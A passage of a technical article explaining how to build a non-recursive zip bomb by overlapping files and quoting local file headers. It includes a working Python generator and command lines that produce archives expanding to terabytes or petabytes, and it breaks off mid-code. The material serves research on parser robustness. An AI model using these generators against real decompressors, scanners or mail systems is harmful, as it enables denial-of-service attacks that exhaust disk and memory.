A better zip bomb
David Fifield
david@bamsoftware.com
Summary
This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB → 281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers.
- Source code: git clone https://www.bamsoftware.com/git/zipbomb.git (or download zipbomb-20190702.zip)
- Data and source for figures: git clone https://www.bamsoftware.com/git/zipbomb-paper.git
 | zipped size | unzipped size (non-recursive) | ratio (non-recursive) | unzipped size (recursive) | ratio (recursive)
---|---|---|---|---|---
Cox quine | 440 | 440 | 1.0 | ∞ | ∞
Ellingsen quine | 28 809 | 42 569 | 1.5 | ∞ | ∞
42.zip | *42 374 | 558 432 | 13.2 | 4 507 981 343 026 016 | 106 billion
this technique | 42 374 | 5 461 307 620 | 129 thousand | 5 461 307 620 | 129 thousand
this technique | 9 893 525 | 281 395 456 244 934 | 28 million | 281 395 456 244 934 | 28 million
this technique (Zip64) | 45 876 952 | 4 507 981 427 706 459 | 98 million | 4 507 981 427 706 459 | 98 million
Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable 4.5 PB if all six of its layers are recursively unzipped, but a trifling 0.6 MB at the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once.
This article shows how to construct a non-recursive zip bomb whose compression ratio surpasses the DEFLATE limit of 1032. It works by overlapping files inside the zip container, in order to reference a "kernel" of highly compressed data in multiple files, without making multiple copies of it. The zip bomb's output size grows quadratically in the input size; i.e., the compression ratio gets better as the bomb gets bigger. The construction depends on features of both zip and DEFLATE; it is not directly portable to other file formats or compression algorithms. It is compatible with most zip parsers, the exceptions being "streaming" parsers that parse in one pass without first consulting the zip file's central directory. We try to balance two conflicting goals:
- Maximize the compression ratio. We define the compression ratio as the sum of the sizes of all the files contained in the zip file, divided by the size of the zip file itself. It does not count filenames or other filesystem metadata, only contents.
- Be compatible. Zip is a tricky format and parsers differ, especially around edge cases and optional features. Avoid taking advantage of tricks that only work with certain parsers. We will remark on certain ways to increase the efficiency of the zip bomb that come with some loss of compatibility.
Structure of a zip file
A zip file consists of a central directory which references files.
The central directory is at the end of the zip file. It is a list of central directory headers. Each central directory header contains metadata for a single file, like its filename and CRC-32 checksum, and a backwards pointer to a local file header. A central directory header is 46 bytes long, plus the length of the filename.
A file consists of a local file header followed by compressed file data. The local file header is 30 bytes long, plus the length of the filename. It contains a redundant copy of the metadata from the central directory header, and the compressed and uncompressed sizes of the file data that follows. Zip is a container format, not a compression algorithm. Each file's data is compressed using an algorithm specified in the metadataโusually DEFLATE.
This description of the zip format omits many details that are not needed for understanding the zip bomb. For full information, refer to section 4.3 of APPNOTE.TXT or The structure of a PKZip file by Florian Buchholz, or see the source code.
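To make the layout concrete, here is a minimal back-to-front parser sketch in Python. It is a sketch under simplifying assumptions (no archive comment, no Zip64), not a full parser, and the function name is mine:

import struct

def list_central_directory(data):
    # End of central directory record: 22 bytes when the comment is empty.
    sig, _, _, _, count, cd_size, cd_offset, _ = struct.unpack(
        '<LHHHHLLH', data[-22:])
    assert sig == 0x06054b50
    pos = cd_offset
    for _ in range(count):
        # Central directory header: 46 bytes plus variable-length fields.
        (sig, _, _, _, method, _, _, crc, csize, usize, name_len,
         extra_len, comment_len, _, _, _, lfh_offset) = struct.unpack(
            '<LHHHHHHLLLHHHHHLL', data[pos:pos+46])
        assert sig == 0x02014b50
        name = data[pos+46:pos+46+name_len]
        yield name, method, csize, usize, lfh_offset
        pos += 46 + name_len + extra_len + comment_len

Each yielded entry carries the backwards pointer (lfh_offset) to its local file header. Nothing in the format stops two entries from pointing at the same offset, which is the loophole the next section exploits.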
The first insight: overlapping files
By compressing a long string of repeated bytes, we can produce a kernel of highly compressed data. By itself, the kernel's compression ratio cannot exceed the DEFLATE limit of 1032, so we want a way to reuse the kernel in many files, without making a separate copy of it in each file. We can do it by overlapping files: making many central directory headers point to a single file, whose data is the kernel.
Let's look at an example to see how this construction affects the compression ratio. Suppose the kernel is 1000 bytes and decompresses to 1 MB. Then the first MB of output "costs" 1078 bytes of input:
- 31 bytes for a local file header (including a 1-byte filename)
- 47 bytes for a central directory header (including a 1-byte filename)
- 1000 bytes for the kernel itself
But every 1 MB of output after the first costs only 47 bytes: we don't need another local file header or another copy of the kernel, only an additional central directory header. So while the first reference to the kernel has a compression ratio of 1 000 000 / 1078 ≈ 928, each additional reference pulls the ratio closer to 1 000 000 / 47 ≈ 21 277. A bigger kernel raises the ceiling.
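The arithmetic, as a sketch in Python using the example numbers above (the 22-byte end-of-central-directory record, not counted in the example, is included here, so the single-file ratio comes out slightly below 928):

def full_overlap_ratio(n_files, kernel_in=1000, kernel_out=10**6,
                       lfh=31, cdh=47):
    # One local file header and one kernel, n_files central directory
    # headers, and a 22-byte end-of-central-directory record.
    zipped = lfh + kernel_in + n_files * cdh + 22
    return n_files * kernel_out / zipped

for n in (1, 10, 100, 1000):
    print(n, round(full_overlap_ratio(n)))   # 909, 6566, 17382, 20810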
The problem with this idea is a lack of compatibility. Because many central directory headers point to a single local file header, the metadata (specifically the filename) cannot match for every file. Some parsers balk at that. Info-ZIP UnZip (the standard Unix unzip program) extracts the files, but with warnings:
$ unzip overlap.zip
  inflating: A
B:  mismatching "local" filename (A),
    continuing with "central" filename version
  inflating: B
...
And the Python zipfile module throws an exception:
$ python3 -m zipfile -e overlap.zip .
Traceback (most recent call last):
...
__main__.BadZipFile: File name in directory 'B' and header b'A' differ.
Next we will see how to modify the construction for consistency of filenames, while still retaining most of the advantage of overlapping files.
The second insight: quoting local file headers
We need to separate the local file headers for each file, while still reusing a single kernel. Simply concatenating all the local file headers does not work, because the zip parser will find a local file header where it expects to find the beginning of a DEFLATE stream. But the idea will work, with a minor modification. We'll use a feature of DEFLATE, non-compressed blocks, to "quote" local file headers so that they appear to be part of the same DEFLATE stream that terminates in the kernel. Every local file header (except the first) will be interpreted in two ways: as code (part of the structure of the zip file) and as data (part of the contents of a file).
A DEFLATE stream is a sequence of blocks, where each block may be compressed or non-compressed. Compressed blocks are what we usually think of; for example, the kernel is one big compressed block. But there are also non-compressed blocks, which start with a 5-byte header whose length field means simply, "output the next n bytes verbatim." Decompressing a non-compressed block means only stripping the 5-byte header. Compressed and non-compressed blocks may be intermixed freely in a DEFLATE stream. The output is the concatenation of the results of decompressing all the blocks in order. The "non-compressed" notion only has meaning at the DEFLATE layer; the file data still counts as "compressed" at the zip layer, no matter what kind of blocks are used.
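For concreteness, a sketch of such a block in Python; a single non-compressed block with BFINAL set is itself a complete raw DEFLATE stream:

import struct, zlib

def stored_block(data, final=False):
    # 1 byte: BFINAL in bit 0, BTYPE=00 (non-compressed) in bits 1-2,
    # 5 bits of padding; then LEN and NLEN (its one's complement),
    # both little-endian.
    header = struct.pack('<BHH', int(final), len(data), len(data) ^ 0xffff)
    return header + data

# Decompressing merely strips the 5-byte header (-15 selects raw DEFLATE).
assert zlib.decompress(stored_block(b'hello', final=True), -15) == b'hello'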
It is easiest to understand this quoted-overlap construction from the inside out, beginning with the last file and working backwards to the first. Start by inserting the kernel, which will form the end of the file data for every file. Prepend a local file header LFH_N and add a central directory header CDH_N that points to it. Set the "compressed size" metadata field in LFH_N and CDH_N to the compressed size of the kernel. Now prepend a 5-byte non-compressed block header (colored green in the diagram) whose length field is equal to the size of LFH_N. Prepend a second local file header LFH_{N−1} and add a central directory header CDH_{N−1} that points to it. Set the "compressed size" metadata field in both of the new headers to the compressed size of the kernel plus the size of the non-compressed block header (5 bytes) plus the size of LFH_N.
At this point the zip file contains two files, named "Y" and "Z". Let's walk through what a zip parser would see while parsing it. Suppose the compressed size of the kernel is 1000 bytes and the size of LFH_N is 31 bytes. We start at CDH_{N−1} and follow the pointer to LFH_{N−1}. The first file's filename is "Y" and the compressed size of its file data is 1036 bytes. Interpreting the next 1036 bytes as a DEFLATE stream, we first encounter the 5-byte header of a non-compressed block that says to copy the next 31 bytes. We copy the next 31 bytes, which are LFH_N, and append them to file "Y". Moving on in the DEFLATE stream, we find a compressed block (the kernel), which we decompress and append to file "Y". Now we have reached the end of the compressed data and are done with file "Y". Proceeding to the next file, we follow the pointer from CDH_N to LFH_N and find a file named "Z" whose compressed size is 1000 bytes. Interpreting those 1000 bytes as a DEFLATE stream, we immediately encounter a compressed block (the kernel again) and decompress it to file "Z". Now we have reached the end of the final file and are done. The output file "Z" contains the decompressed kernel; the output file "Y" is the same, but additionally prefixed by the 31 bytes of LFH_N.
We complete the construction by repeating the quoting procedure until the zip file contains the desired number of files. Each new file adds a central directory header, a local file header, and a non-compressed block to quote the immediately succeeding local file header. Each file's compressed data is generally a chain of DEFLATE non-compressed blocks (the quoted local file headers) followed by the compressed kernel. Each byte in the kernel contributes about 1032·N to the output size, because each byte is part of all N files. The output files are not all the same size: those that appear earlier in the zip file are larger than those that appear later, because they contain more quoted local file headers. The contents of the output files are not particularly meaningful, but no one said they had to make sense.
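The following sketch in Python generates a working quoted-overlap zip along these lines. It is my own condensation, not the zipbomb tool itself: it computes each file's CRC-32 directly over the whole output (practical only for small kernels; the matrix shortcut comes later in the article), and it hard-codes a DOS date of 1980-01-01 and compression method 8 (DEFLATE).

import struct, zlib

def deflate(data):
    # Raw DEFLATE stream (no zlib header), ending in a BFINAL=1 block.
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def stored_header(n):
    # 5-byte non-compressed block header: BFINAL=0, BTYPE=00, LEN, NLEN.
    return struct.pack('<BHH', 0, n, n ^ 0xffff)

def local_header(name, crc, csize, usize):
    return struct.pack('<LHHHHHLLLHH', 0x04034b50, 20, 0, 8,
                       0, 0x21, crc, csize, usize, len(name), 0) + name

def central_header(name, crc, csize, usize, offset):
    return struct.pack('<LHHHHHHLLLHHHHHLL', 0x02014b50, 20, 20, 0, 8,
                       0, 0x21, crc, csize, usize, len(name),
                       0, 0, 0, 0, 0, offset) + name

def quoted_overlap_zip(names, kernel_plain):
    kernel = deflate(kernel_plain)
    # Build metadata backwards, from the last file to the first. Each
    # earlier file quotes the next file's local header, gaining
    # 5 + len(header) compressed bytes and len(header) output bytes.
    output, csize = kernel_plain, len(kernel)
    crc = zlib.crc32(output)
    header = local_header(names[-1], crc, csize, len(output))
    files = [(header, crc, csize, len(output))]
    for name in reversed(names[:-1]):
        csize += 5 + len(header)
        output = header + output
        crc = zlib.crc32(output)
        header = local_header(name, crc, csize, len(output))
        files.append((header, crc, csize, len(output)))
    files.reverse()
    # Lay out: LFH_1, quote, LFH_2, quote, ..., LFH_N, kernel.
    body, offsets = b'', []
    for i, (header, _, _, _) in enumerate(files):
        offsets.append(len(body))
        body += header
        if i + 1 < len(files):
            body += stored_header(len(files[i + 1][0]))
    body += kernel
    cd = b''.join(central_header(name, crc, csize, usize, offset)
                  for (_, crc, csize, usize), name, offset
                  in zip(files, names, offsets))
    end = struct.pack('<LHHHHLLH', 0x06054b50, 0, 0, len(files),
                      len(files), len(cd), len(body), 0)
    return body + cd + end

with open('bomb.zip', 'wb') as f:
    f.write(quoted_overlap_zip([b'A', b'B', b'C'], b'a' * 1000000))

The result should extract cleanly, with earlier files longer than later ones, exactly as described above.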
This quoted-overlap construction has better compatibility than the full-overlap construction of the previous section, but the compatibility comes at the expense of the compression ratio. There, each added file cost only a central directory header; here, it costs a central directory header, a local file header, and another 5 bytes for the quoting header.
Optimization
Now that we have the basic zip bomb construction, we will try to make it as efficient as possible. We want to answer two questions:
- For a given zip file size, what is the maximum compression ratio?
- What is the maximum compression ratio, given the limits of the zip format?
Kernel compression
It pays to compress the kernel as densely as possible, because every decompressed byte gets magnified by a factor of N. To that end, we use a custom DEFLATE compressor called bulk_deflate, specialized for compressing a string of repeated bytes.
All decent DEFLATE compressors will approach a compression ratio of 1032 when given an infinite stream of repeating bytes, but we care more about specific finite sizes than asymptotics. bulk_deflate compresses more data into the same space than the general-purpose compressors: about 26 kB more than zlib and Info-ZIP, and about 15 kB more than Zopfli, a compressor that trades speed for density.
The price of bulk_deflate's high compression ratio is a lack of generality. bulk_deflate can only compress strings of a single repeated byte, and only those of specific lengths, namely 517 + 258·k bytes for integer k ≥ 0. Besides compressing densely, bulk_deflate is fast, doing essentially constant work regardless of the input size, aside from the work of actually writing out the compressed string.
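You can watch a general-purpose compressor approach the 1032 asymptote with a few lines of Python (exact compressed sizes vary with the zlib version and level):

import zlib

for n in (10**4, 10**6, 10**8):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE
    compressed = c.compress(b'a' * n) + c.flush()
    print(n, len(compressed), round(n / len(compressed)))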
Filenames
For our purposes, filenames are mostly dead weight. While filenames do contribute something to the output size by virtue of being part of quoted local file headers, a byte in a filename does not contribute nearly as much as a byte in the kernel. We want filenames to be as short as possible, while keeping them all distinct, and subject to compatibility considerations.
The first compatibility consideration is character encoding. The zip format specification states that filenames are to be interpreted as CP 437, or UTF-8 if a certain flag bit is set (APPNOTE.TXT Appendix D). But this is a major point of incompatibility across zip parsers, which may interpret filenames as being in some fixed or locale-specific encoding. So for compatibility, we must limit ourselves to characters that have the same encoding in both CP 437 and UTF-8; namely, the 95 printable characters of US-ASCII.
We are further restricted by filesystem naming limitations. Some filesystems are case-insensitive, so "a" and "A" do not count as distinct names. Common filesystems like FAT32 prohibit certain characters like '*' and '?'.
As a safe but not necessarily optimal compromise, our zip bomb will use filenames consisting of characters drawn from a 36-character alphabet that does not rely on case distinctions or use special characters:

0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

Filenames are generated in the obvious way, cycling each position through the possible characters and adding a position on overflow:

"0", "1", "2", …, "Z",
"00", "01", "02", …, "0Z",
…,
"Z0", "Z1", "Z2", …, "ZZ",
"000", "001", "002", …
There are 36 filenames of length 1, 36^2 filenames of length 2, and so on. Four bytes are enough to represent 1 727 604 distinct filenames.
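A generator sketch for this naming scheme, emitting shortest names first (which, per the next paragraph, is also the order that puts the longest, most-quoted names last):

import itertools, string

ALPHABET = string.digits + string.ascii_uppercase   # the 36 characters above

def filenames():
    for length in itertools.count(1):
        for combo in itertools.product(ALPHABET, repeat=length):
            yield ''.join(combo)

# "0", "1", ..., "Z", "00", "01", ...
print(list(itertools.islice(filenames(), 40)))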
Given that the N filenames in the zip file are generally not all of the same length, which way should we order them, shortest to longest or longest to shortest? A little reflection shows that it is better to put the longest names last, because those names are the most quoted. Ordering filenames longest last adds over 900 MB of output to zblg.zip, compared to ordering them longest first. It is a minor optimization, though, as those 900 MB comprise only 0.0003% of the total output size.
Kernel size
The quoted-overlap construction allows us to place a compressed kernel of data, and then cheaply copy it many times. For a given zip file size X, how much space should we devote to storing the kernel, and how much to making copies?
To find the optimum balance, we only have to optimize the single variable N, the number of files in the zip file. Every value of N requires a certain amount of overhead for central directory headers, local file headers, quoting block headers, and filenames. All the remaining space can be taken up by the kernel. Because N has to be an integer, and you can only fit so many files before the kernel size drops to zero, it suffices to test every possible value of N and select the one that yields the most output.
Applying the optimization procedure to X = 42 374, the size of 42.zip, finds a maximum at N = 250. Those 250 files require 21 195 bytes of overhead, leaving 21 179 bytes for the kernel. A kernel of that size decompresses to 21 841 249 bytes (a ratio of 1031.3). The 250 copies of the decompressed kernel, plus the little bit extra from the quoted local file headers, produce an overall unzipped output of 5 461 307 620 bytes and a compression ratio of 129 thousand.
zipbomb --mode=quoted_overlap --num-files=250 --compressed-size=21179 > zbsm.zip
Optimization produced an almost even split between the space allocated to the kernel and the space allocated to file headers. It is not a coincidence. Let's look at a simplified model of the quoted-overlap construction. In the simplified model, we ignore filenames, as well as the slight increase in output file size due to quoting local file headers. Analysis of the simplified model will show that the optimum split between kernel and file headers is approximately even, and that the output size grows quadratically when allocation is optimal.
Define some constants and variables:
symbol | value | meaning
---|---|---
X | | zip file size (taken as fixed)
N | | number of files in the zip file (the variable to optimize)
CDH | 46 | size of a central directory header (without filename)
LFH | 30 | size of a local file header (without filename)
Q | 5 | size of a DEFLATE non-compressed block header
C | ≈ 1032 | compression ratio of the kernel
Let H(N) be the amount of header overhead required by N files. Refer to the diagram to understand where this formula comes from.
H(N) = N·(CDH + LFH) + (N − 1)·Q
The space remaining for the kernel is X − H(N). The total unzipped size S_X(N) is the size of N copies of the kernel, decompressed at ratio C. (In this simplified model we ignore the minor additional expansion from quoted local file headers.)
S_X(N) = (X − H(N))·C·N
       = (X − (N·(CDH + LFH) + (N − 1)·Q))·C·N
       = −(CDH + LFH + Q)·C·N² + (X + Q)·C·N
S_X(N) is a polynomial in N, so its maximum must be at a place where the derivative S′_X(N) is zero. Taking the derivative and finding the zero gives us N_OPT, the optimal number of files.
S′_X(N_OPT) = −2·(CDH + LFH + Q)·C·N_OPT + (X + Q)·C
0 = −2·(CDH + LFH + Q)·C·N_OPT + (X + Q)·C
N_OPT = (X + Q) / (2·(CDH + LFH + Q))
H(N_OPT) gives the optimal amount of space to allocate for file headers. It is independent of CDH, LFH, and C, and is close to X / 2.
H(N_OPT) = N_OPT·(CDH + LFH) + (N_OPT − 1)·Q
         = (X − Q) / 2
S_X(N_OPT) is the total unzipped size when the allocation is optimal. From this we see that the output size grows quadratically in the input size.
S_X(N_OPT) = (X + Q)²·C / (4·(CDH + LFH + Q))
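A quick numeric check of the simplified model in Python; the real optimizer also accounts for filenames, which is why the article's optimum for this X is 250 rather than the model's 262:

CDH, LFH, Q, C = 46, 30, 5, 1032

def S(X, N):
    # Total unzipped size in the simplified model.
    return (X - (N * (CDH + LFH) + (N - 1) * Q)) * C * N

X = 42374
closed_form = round((X + Q) / (2 * (CDH + LFH + Q)))
brute_force = max(range(1, 1000), key=lambda N: S(X, N))
print(closed_form, brute_force)   # both 262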
As we make the zip file larger, eventually we run into the limits of the zip format. A zip file can contain at most 2^16 − 1 files, and each file can have an uncompressed size of at most 2^32 − 1 bytes. Worse than that, some implementations take the maximum possible values as an indicator of the presence of 64-bit extensions, so our limits are actually 2^16 − 2 and 2^32 − 2. It happens that the first limit we hit is the one on uncompressed file size. At a zip file size of 8 319 377 bytes, naive optimization would give us a file count of 47 837 and a largest file with the impossible size of 2^32 + 311 bytes.
Accepting that we cannot increase N nor the size of the kernel without bound, we would like to find the maximum compression ratio achievable while remaining within the limits of the zip format. The way to proceed is to make the kernel as large as possible, and have the maximum number of files. Even though we can no longer maintain the roughly even split between kernel and file headers, each added file does increase the compression ratio, just not as fast as it would if we were able to keep growing the kernel, too. In fact, as we add files we need to shrink the kernel slightly, to keep the largest file, which grows a little with each added file, within the maximum file size.
The plan results in a zip file that contains 2^16 − 2 files and a kernel that decompresses to 2^32 − 2 178 825 bytes. Files get longer towards the beginning of the zip file; the first and largest file decompresses to 2^32 − 56 bytes. That is as close as we can get using the coarse output sizes of bulk_deflate: encoding the final 54 bytes would cost more bytes than they are worth. (The zip file as a whole has a compression ratio of 28 million, and the final 54 bytes would gain at most 54 × 1032 × (2^16 − 2) ≈ 36.5 million bytes, so it only helps if the 54 bytes can be encoded in 1 byte, and I could not do it in less than 2.) The output size of this zip bomb, 281 395 456 244 934 bytes, is 99.97% of the theoretical maximum (2^32 − 1) × (2^16 − 1). Any major improvements to the compression ratio can only come from reducing the input size, not increasing the output size.
zipbomb --mode=quoted_overlap --num-files=65534 --max-uncompressed-size=4292788525 > zblg.zip
Efficient CRC-32 computation
Among the metadata in the central directory header and local file header is a CRC-32 checksum of the uncompressed file data. This poses a problem, because directly calculating the CRC-32 of each file requires doing work proportional to the total unzipped size, which is large by design. (It's a zip bomb, after all.) We would prefer to do work that in the worst case is proportional to the zipped size. Two factors work in our advantage: all files share a common suffix (the kernel), and the uncompressed kernel is a string of repeated bytes. We will represent CRC-32 as a matrix product; this will allow us not only to compute the checksum of the kernel quickly, but also to reuse computation across files. The technique described in this section is a slight extension of the crc32_combine function in zlib, which Mark Adler explains here.
You can model CRC-32 as a state machine that updates a 32-bit state register for each incoming bit. The basic update operations for a 0 bit and a 1 bit are:
#include <stdint.h>

uint32_t crc32_update_0(uint32_t state) {
    // Shift out the least significant bit.
    uint32_t b = state & 1;
    state = state >> 1;
    // If the shifted-out bit was 1, XOR with the CRC-32 constant.
    if (b == 1)
        state = state ^ 0xedb88320;
    return state;
}

uint32_t crc32_update_1(uint32_t state) {
    // Do as for a 0 bit, then XOR with the CRC-32 constant.
    return crc32_update_0(state) ^ 0xedb88320;
}
If you think of the state register as a 32-element binary vector, and use XOR for addition and AND for multiplication, then crc32_update_0 is a linear transformation; i.e., it can be represented as multiplication by a 32×32 binary transformation matrix. To see why, observe that multiplying a matrix by a vector is just summing the columns of the matrix, after multiplying each column by the corresponding element of the vector. The shift operation state >> 1 is just taking each bit i of the state vector and multiplying it by a vector that is 0 everywhere except at bit i − 1 (numbering the bits from right to left). The conditional final XOR state ^ 0xedb88320 only happens when bit b is 1; it can be represented as first multiplying b by 0xedb88320 and then XORing it into the state.

Furthermore, crc32_update_1 is just crc32_update_0 plus (XOR) a constant. That makes crc32_update_1 an affine transformation: a matrix multiplication followed by a translation (i.e., vector addition). We can represent both the matrix multiplication and the translation in a single step if we enlarge the dimensions of the transformation matrix to 33×33 and append an extra element to the state vector that is always 1. (This representation is called homogeneous coordinates.)
Both operations crc32_update_0 and crc32_update_1 can be represented by a 33×33 transformation matrix; the matrices M_0 and M_1 are shown in the original figure. [Each is mostly a shifted identity matrix (the state >> 1 operation), with the bits of the constant 0xedb88320 in the first column (the conditional XOR, driven by the shifted-out bit); M_1 additionally has the bits of 0xedb88320 in the final column (the unconditional XOR, fed by the constant 1 of the homogeneous coordinates).] The benefit of a matrix representation is that matrices compose. Suppose we want to represent the state change effected by processing the ASCII character 'a', whose binary representation is 01100001. We can represent the cumulative CRC-32 state change of those 8 bits in a single transformation matrix:
M_a = M_0 M_1 M_1 M_0 M_0 M_0 M_0 M_1
And we can represent the state change of a string of repeated 'a's by multiplying many copies of M_a together, i.e., matrix exponentiation. We can do matrix exponentiation quickly using a square-and-multiply algorithm, which allows us to compute M^n in only about log_2 n steps. For example, the matrix representing the state change of a string of 9 'a's is
(M_a)^9 = M_a M_a M_a M_a M_a M_a M_a M_a M_a
        = (M_a M_a M_a M_a)^2 M_a
        = ((M_a M_a)^2)^2 M_a
        = (((M_a)^2)^2)^2 M_a
The square-and-multiply algorithm is useful for computing M_kernel, the matrix for the uncompressed kernel, because the kernel is a string of repeated bytes. To produce a CRC-32 checksum value from a matrix, multiply the matrix by the zero vector. (The zero vector in homogeneous coordinates, that is: 32 0's followed by a 1. Here we omit the minor complication of pre- and post-conditioning the checksum.) To compute the checksum for every file, we work backwards. Start by initializing M := M_kernel. The checksum of the kernel is also the checksum of the final file, file N, so multiply M by the zero vector and store the resulting checksum in CDH_N and LFH_N. The file data of file N − 1 is the same as the file data of file N, but with an added prefix of LFH_N. So compute M_LFH_N, the state-change matrix for LFH_N, and update M := M · M_LFH_N. Now M represents the cumulative state change from processing LFH_N followed by the kernel. Compute the checksum for file N − 1 by again multiplying M by the zero vector. Continue the procedure, accumulating state-change matrices into M, until all the files have been processed.
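Here is the technique as a sketch in Python, representing each 33×33 GF(2) matrix as a list of 33 row bitmasks. Unlike the exposition above, it includes the pre- and post-conditioning, so its output can be checked against zlib.crc32; all names are mine, not the zipbomb source's.

import zlib   # used only to check the result

POLY = 0xedb88320

def parity(x):
    return bin(x).count('1') & 1

def identity():
    return [1 << i for i in range(33)]

def mat_mul(a, b):
    # Over GF(2), row i of a*b is the XOR of the rows of b selected by
    # the bits of row i of a.
    product = []
    for row in a:
        acc, k = 0, 0
        while row:
            if row & 1:
                acc ^= b[k]
            row >>= 1
            k += 1
        product.append(acc)
    return product

def bit_matrix(bit):
    # M_0 (bit=0) or M_1 (bit=1): the matrix of crc32_update_0/1.
    m = []
    for j in range(32):
        row = (1 << (j + 1)) if j < 31 else 0   # the state >> 1 shift
        if (POLY >> j) & 1:
            row |= 1                # conditional XOR, driven by the low bit
            if bit:
                row |= 1 << 32      # unconditional XOR, via the constant 1
        m.append(row)
    m.append(1 << 32)               # the homogeneous coordinate stays 1
    return m

def byte_matrix(byte):
    m = identity()
    for k in range(8):              # CRC-32 consumes bits LSB-first
        m = mat_mul(bit_matrix((byte >> k) & 1), m)
    return m

def mat_pow(m, n):
    # Square-and-multiply: about log2(n) matrix multiplications.
    result = identity()
    while n:
        if n & 1:
            result = mat_mul(result, m)
        m = mat_mul(m, m)
        n >>= 1
    return result

def crc32_repeated(byte, n):
    # CRC-32 of the given byte repeated n times.
    m = mat_pow(byte_matrix(byte), n)
    v = 0xffffffff | (1 << 32)      # pre-conditioned state, plus the 1
    state = sum(parity(row & v) << i for i, row in enumerate(m[:32]))
    return state ^ 0xffffffff       # post-conditioning

assert crc32_repeated(ord('a'), 10**6) == zlib.crc32(b'a' * 10**6)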
Extension: Zip64
Earlier we hit a wall on expansion due to limits of the zip format: it was impossible to produce more than about 281 TB of output, no matter how cleverly packed the zip file. It is possible to surpass those limits using Zip64, an extension to the zip format that increases the size of certain header fields to 64 bits. Support for Zip64 is by no means universal, but it is one of the more commonly implemented extensions. As regards the compression ratio, the effect of Zip64 is to increase the size of a central directory header from 46 bytes to 58 bytes, and the size of a local file header from 30 bytes to 50 bytes. Referring to the formula for optimal expansion in the simplified model, we see that a zip bomb in Zip64 format still grows quadratically, but more slowly because of the larger denominator; this is visible in the figure below in the Zip64 line's slightly lower vertical placement. In exchange for the loss of compatibility and slower growth, we get the removal of all practical file size limits.
Suppose we want a zip bomb that expands to 4.5 PB, the same size that 42.zip recursively expands to. How big must the zip file be? Using binary search, we find that the smallest zip file whose unzipped size exceeds the unzipped size of 42.zip has a zipped size of 46 MB.
zipbomb --mode=quoted_overlap --num-files=190023 --compressed-size=22982788 --zip64 > zbxl.zip
4.5 PB is roughly the size of the data captured by the Event Horizon Telescope to make the first image of a black hole, stacks and stacks of hard drives.
With Zip64, it's no longer practically interesting to consider the maximum compression ratio, because we can just keep increasing the zip file size, and the compression ratio along with it, until even the compressed zip file is prohibitively large. An interesting threshold, though, is 2^64 bytes (18 EB or 16 EiB); that much data will not fit on most filesystems. Binary search finds the smallest zip bomb that produces at least that much output: it contains 12 million files and has a compressed kernel of 1.5 GB. The total size of the zip file is 2.9 GB and it unzips to 2^64 + 11 727 895 877 bytes, a compression ratio of over 6.2 billion. I didn't make this one downloadable, but you can generate it yourself using the source code. It contains files so large that it uncovers a bug in Info-ZIP UnZip 6.0.
zipbomb --mode=quoted_overlap --num-files=12056313 --compressed-size=1482284040 --zip64 > zbxxl.zip
Extension: bzip2
DEFLATE is the most common compression algorithm used in the zip format, but it is only one of many options. bzip2, while not nearly as compatible as DEFLATE, is probably the second most commonly supported compression algorithm. Empirically, bzip2 has a maximum compression ratio of about 1.4 million, which allows for denser packing of the kernel. Ignoring the loss of compatibility, does bzip2 enable a more efficient zip bomb?
Yesโbut only for small files. The problem is that bzip2 does not have anything like the non-compressed blocks of DEFLATE that we used to quote local file headers. So it is not possible to overlap files and reuse the kernelโeach file must have its own copy, and therefore the overall compression ratio is no better than the ratio of any single file. In the figure we see that no-overlap bzip2 outperforms quoted DEFLATE only for files under about a megabyte.
There is still hope for bzip2: an alternative means of quoting local file headers, discussed in the next section. Additionally, if you happen to know that a certain zip parser supports bzip2 and tolerates mismatched filenames, then you can use the full-overlap construction, which has no need for quoting.
Extension: extra-field quoting
So far we have used a feature of DEFLATE to quote local file headers, and we have just seen that the same trick does not work with bzip2. There is an alternative means of quoting, somewhat more limited, that only uses features of the zip format and does not depend on the compression algorithm.
At the end of the local file header structure there is a variable-length extra field whose purpose is to store information that doesn't fit into the ordinary fields of the header (APPNOTE.TXT section 4.3.7). The extra information may include, for example, a high-resolution timestamp or a Unix uid/gid; Zip64 information is stored in the extra field. The extra field is represented as a length-value structure; if we increase the length field without adding to the value, then the extra field will grow to include whatever comes after it in the zip file, namely the next local file header. Using this technique, each local file header can "quote" the following local file headers by enclosing them within its own extra field. The benefits of extra-field quoting, as compared to DEFLATE non-compressed block quoting, are threefold:
- Extra-field quoting requires only 4 bytes of overhead, not 5, leaving more room for the kernel.
- Extra-field quoting does not increase the size of files, which leaves more headroom for a bigger kernel when operating at the limits of the zip format.
- Extra-field quoting provides a way of combining quoting with bzip2.
Despite these benefits, extra-field quoting is less flexible than DEFLATE quoting. It does not chain like DEFLATE quoting does: each local file header must enclose not only the immediately next header but all headers which follow. The extra fields increase in length as they get closer to the beginning of the zip file. Because the extra field has a maximum length of 2^16 − 1 bytes, it is only possible to quote up to 1808 local file headers (or 1170 with Zip64), assuming that filenames are allocated as described. (In the case of DEFLATE, you can use extra-field quoting for the first (shortest) local file headers, then switch to DEFLATE quoting for the remainder.) Another problem is that, in order to conform to the internal data structure of the extra field, you must select a 16-bit type tag (APPNOTE.TXT section 4.5.2) to precede the quoted data. We want to choose a type tag that will cause parsers to ignore the quoted data, rather than trying to interpret it as meaningful metadata. Zip parsers are supposed to ignore unknown type tags, so we could choose a type tag at random, but there is the risk that the tag may be allocated in the future, breaking the compatibility of the construction.
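The quoting record itself is tiny. A sketch in Python; the tag 0x9999 is an arbitrary stand-in for the unassigned-tag choice discussed above, not a value used by the article's tool:

import struct

def quoting_extra_record(quoted_len, tag=0x9999):
    # An extra-field record is a 16-bit type tag followed by a 16-bit data
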